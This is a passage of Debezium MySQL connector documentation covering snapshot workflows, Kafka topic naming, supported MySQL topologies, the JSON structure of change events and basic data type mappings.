initial _consistent snapshot_ of your database. The following flow describes how the connector creates this snapshot. This flow is for the default snapshot mode, which is `initial`. For information about other snapshot modes, see the {link-prefix}:{link-mysql-connector}#mysql-property-snapshot-mode[MySQL connector `snapshot.mode` configuration property].\n\n.Workflow for performing an initial snapshot with a global read lock\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\na| Grabs a global read lock that blocks _writes_ by other database clients. +\n + \nThe snapshot itself does not prevent other clients from applying DDL that might interfere with the connector's attempt to read the binlog position and table schemas. The connector keeps the global read lock while it reads the binlog position, and releases the lock as described in a later step.\n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\na|Reads the current binlog position.\n\n|4\na|Reads the schema of the databases and tables for which the connector is configured to capture changes.\n\n|5\na|Releases the global read lock. Other database clients can now write to the database.\n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements. \n\n|7\na|Scans the database tables. For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\na|Records the completed snapshot in the connector offsets.\n\n|===\n\nConnector restarts::\nIf the connector fails, stops, or is rebalanced while performing the _initial snapshot_, then after the connector restarts, it performs a new snapshot. After that _intial snapshot_ is completed, the {prodname} MySQL connector restarts from the same position in the binlog so it does not miss any updates.\n+\nIf the connector stops for long enough, MySQL could purge old binlog files and the connector's position would be lost. If the position is lost, the connector reverts to the _initial snapshot_ for its starting position. For more tips on troubleshooting the {prodname} MySQL connector, see {link-prefix}:{link-mysql-connector}#mysql-when-things-go-wrong[behavior when things go wrong].\n\nGlobal read locks not allowed::\nSome environments do not allow global read locks. If the {prodname} MySQL connector detects that global read locks are not permitted, the connector uses table-level locks instead and performs a snapshot with this method. This requires the database user for the {prodname} connector to have `LOCK_TABLES` privileges. \n+\n.Workflow for performing an initial snapshot with table-level locks\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\n|Obtains table-level locks. \n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\n|Reads and filters the names of the databases and tables.\n\n|4\na|Reads the current binlog position.\n\n|5\na|Reads the schema of the databases and tables for which the connector is configured to capture changes. \n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements.\n\n|7\na|Scans the database tables. For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\n|Releases the table-level locks.\n\n|10\na|Records the completed snapshot in the connector offsets.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MySQL change event records\n[[mysql-topic-names]]\n=== Topic names\n\nThe default behavior is that a {prodname} MySQL connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations in one table to one Kafka topic. The Kafka topic naming convention is as follows:\n\n_serverName.databaseName.tableName_\n\nSuppose that `fulfillment` is the server name, `inventory` is the database name, and the database contains tables named `orders`, `customers`, and `products`. The {prodname} MySQL connector emits events to three Kafka topics, one for each table in the database:\n\n----\nfulfillment.inventory.orders\nfulfillment.inventory.customers\nfulfillment.inventory.products\n----\n\n\/\/ Type: concept\n\/\/ ModuleID: mysql-topologies-supported-by-debezium-connectors\n\/\/ Title: MySQL topologies supported by {prodname} connectors\n[id=\"supported-mysql-topologies\"]\n=== Supported MySQL topologies\n\nThe {prodname} MySQL connector supports the following MySQL topologies:\n\nStandalone::\nWhen a single MySQL server is used, the server must have the binlog enabled (_and optionally GTIDs enabled_) so the {prodname} MySQL connector can monitor the server. This is often acceptable, since the binary log can also be used as an incremental link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/backup-methods.html[backup]. In this case, the MySQL connector always connects to and follows this standalone MySQL server instance.\n\nPrimary and replica::\nThe {prodname} MySQL connector can follow one of the primary servers or one of the replicas (_if that replica has its binlog enabled_), but the connector sees changes in only the cluster that is visible to that server. Generally, this is not a problem except for the multi-primary topologies.\n+\nThe connector records its position in the server\u2019s binlog, which is different on each server in the cluster. Therefore, the connector must follow just one MySQL server instance. If that server fails, that server must be restarted or recovered before the connector can continue.\n\nHigh available clusters::\nA variety of link:https:\/\/dev.mysql.com\/doc\/mysql-ha-scalability\/en\/[high availability] solutions exist for MySQL, and they make it significantly easier to tolerate and almost immediately recover from problems and failures. Most HA MySQL clusters use GTIDs so that replicas are able to keep track of all changes on any of the primary servers.\n\nMulti-primary::\nlink:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/mysql-cluster-replication-multi-source.html[Network Database (NDB) cluster replication] uses one or more MySQL replica nodes that each replicate from multiple primary servers. This is a powerful way to aggregate the replication of multiple MySQL clusters. This topology requires the use of GTIDs.\n+\nA {prodname} MySQL connector can use these multi-primary MySQL replicas as sources, and can fail over to different multi-primary MySQL replicas as long as the new replica is caught up to the old replica. That is, the new replica has all transactions that were seen on the first replica. This works even if the connector is using only a subset of databases and\/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-primary MySQL replica and find the correct position in the binlog.\n\nHosted::\nThere is support for the {prodname} MySQL connector to use hosted options such as Amazon RDS and Amazon Aurora.\n+\nBecause these hosted options do not allow a global read lock, table-level locks are used to create the _consistent snapshot_.\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mysql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MySQL connector data change events\n[[mysql-events]]\n== Data change events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converver and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-mysql-connector}#mysql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. \n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#mysql-topic-names[topic names].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or `_`. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or `_`. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nMore details are in the following topics:\n\n* xref:about-keys-in-debezium-mysql-change-events[]\n* xref:about-values-in-debezium-mysql-change-events[]\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mysql-change-events\n\/\/ Title: About keys in {prodname} mysql change events\n[[mysql-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1001`.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mysql-change-events\n\/\/ Title: About values in {prodname} MySQL change events\n[[mysql-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure. \n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-primary-key-updates,Primary key updates>>\n* <<mysql-delete-events,_delete_ events>>\n* <<mysql-tombstone-events,Tombstone events>>\n\n\/\/ Type: continue\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mysql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"op\": \"c\", \/\/ <6>\n \"ts_ms\": 1465491411815, \/\/ <7>\n \"before\": null, \/\/ <8>\n \"after\": { \/\/ <9>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <10>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\n|`io.debezium.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n|4\n|`name`\n|`mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|7\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|8\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|9\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|10\n|`source`\na| Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the new row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|===\n\n\/\/ Type: continue\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465581029523 \n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`. \n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section. \n====\n\n\/\/ Type: continue\n[id=\"mysql-primary-key-updates\"]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change: \n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n\/\/ Type: continue\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[id=\"mysql-tombstone-events\"]\n=== Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-mysql-connectors-map-data-types\n\/\/ Title: How {prodname} MySQL connectors map data types\n[[mysql-data-types]]\n== Data type mappings\n\nThe {prodname} MySQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. The MySQL data type of that column dictates how {prodname} represents the value in the event.\n\nColumns that store strings are defined in MySQL with a character set and collation. The MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events. \n\nThe connector can map MySQL data types to both _literal_ and _semantic_ types.\n\n* *Literal type*: how the value is represented using Kafka Connect schema types\n* *Semantic type*: how the Kafka Connect schema captures the meaning of the field (schema name)\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:mysql-basic-types[]\n* xref:mysql-temporal-types[]\n* xref:mysql-decimal-types[]\n* xref:mysql-boolean-values[]\n* xref:mysql-spatial-types[]\n\nendif::product[]\n\n[id=\"mysql-basic-types\"]\n=== Basic types\n\nThe following table shows how the connector maps basic MySQL data types.\n\n.Descriptions of basic type mappings\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`BOOLEAN, BOOL`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(1)`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(>1)`\n|`BYTES`\na|`io.debezium.data.Bits` +\nThe `length` schema parameter contains an integer that represents the number of bits. The `byte[]` contains the bits in _little-endian_ form and is sized to contain the specified number of bits. For example, where `n` is bits: +\n`numBytes = n\/8 + (n%8== 0 ? 0 : 1)`\n\n|`TINYINT`\n|`INT16`\na|_n\/a_\n\n|`SMALLINT[(M)]`\n|`INT16`\na|_n\/a_\n\n|`MEDIUMINT[(M)]`\n|`INT32`\na|_n\/a_\n\n|`INT, INTEGER[(M)]`\n|`INT32`\na|_n\/a_\n\n|`BIGINT[(M)]`\n|`INT64`\na|_n\/a_\n\n|`REAL[(M,D)]`\n|`FLOAT32`\na|_n\/a_\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`CHAR(M)]`\n|`STRING`\na|_n\/a_\n\n|`VARCHAR(M)]`\n|`STRING`\na|_n\/a_\n\n|`BINARY(M)]`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`VARBINARY(M)]`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TINYBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TINYTEXT`\n|`STRING`\na|_n\/a_\n\n|`BLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TEXT`\n|`STRING`\na|_n\/a_\n\n|`MEDIUMBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`MEDIUMTEXT`\n|`STRING`\na|_n\/a_\n\n|`LONGBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`LONGTEXT`\n|`STRING`\na|_n\/a_\n\n|`JSON`\n|`STRING`\na|`io.debezium.data.Json` +\nContains the string representation of a `JSON` document, array, or scalar.\n\n|`ENUM`\n|`STRING`\na|`io.debezium.data.Enum` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\na|`io.debezium.data.EnumSet` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`INT32`\n|`io.debezium.time.Year`\n\n|`TIMESTAMP[(M)]`\n|`STRING`\na|`io.debezium.time.ZonedTimestamp` +\nIn link:https:\/\/www.iso.org\/iso-8601-date-and-time-format.html[ISO 8601] format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.\n\n|===\n\n[id=\"mysql-temporal-types\"]\n=== Temporal types\n\nExcluding the `TIMESTAMP` data type, MySQL temporal types depend on the value of the `time.precision.mode` 